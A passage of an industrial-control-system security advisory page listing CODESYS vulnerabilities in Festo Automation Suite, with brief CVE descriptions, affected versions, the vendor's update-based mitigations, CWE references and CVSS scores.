<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/755.html">CWE-755 Improper Handling of Exceptional Conditions</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.1</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-1989</a></h3>
<div class="csaf-accordion-content">
<p>All CODESYS Visualization versions before V4.2.0.0 generate a login dialog vulnerable to information exposure allowing a remote, unauthenticated attacker to enumerate valid users.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-1989">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.3</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-22508</a></h3>
<div class="csaf-accordion-content">
<p>Improper Input Validation vulnerability in multiple CODESYS V3 products allows an authenticated remote attacker to block consecutive logins of a specific type.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-22508">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>4.3</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-22513</a></h3>
<div class="csaf-accordion-content">
<p>An authenticated remote attacker can cause a null pointer dereference in the CmpSettings component of the affected CODESYS products which leads to a crash.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-22513">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.0</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-22514</a></h3>
<div class="csaf-accordion-content">
<p>An authenticated, remote attacker can gain access to a dereferenced pointer contained in a request. The accesses can subsequently lead to local overwriting of memory in the CmpTraceMgr, whereby the attacker can neither gain the values read internally nor control the values to be written. If invalid memory is accessed, this results in a crash.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-22514">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/822.html">CWE-822 Untrusted Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.1</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-22515</a></h3>
<div class="csaf-accordion-content">
<p>A remote, authenticated attacker could utilize the control program of the CODESYS Control runtime system to use the vulnerability in order to read and modify the configuration file(s) of the affected products.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-22515">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/668.html">CWE-668 Exposure of Resource to Wrong Sphere</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.1</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-22516</a></h3>
<div class="csaf-accordion-content">
<p>The SysDrv3S driver in the CODESYS Control runtime system on Microsoft Windows allows any system user to read and write within restricted memory space.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-22516">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/732.html">CWE-732 Incorrect Permission Assignment for Critical Resource</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-22517</a></h3>
<div class="csaf-accordion-content">
<p>An unauthenticated, remote attacker can disrupt existing communication channels between CODESYS products by guessing a valid channel ID and injecting packets. This results in the communication channel to be closed.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-22517">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/33.html">CWE-33 Path Traversal: '....' (Multiple Dot)</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-22519</a></h3>
<div class="csaf-accordion-content">
<p>A remote, unauthenticated attacker can send a specific crafted HTTP or HTTPS requests causing a buffer over-read resulting in a crash of the webserver of the CODESYS Control runtime system.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-22519">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
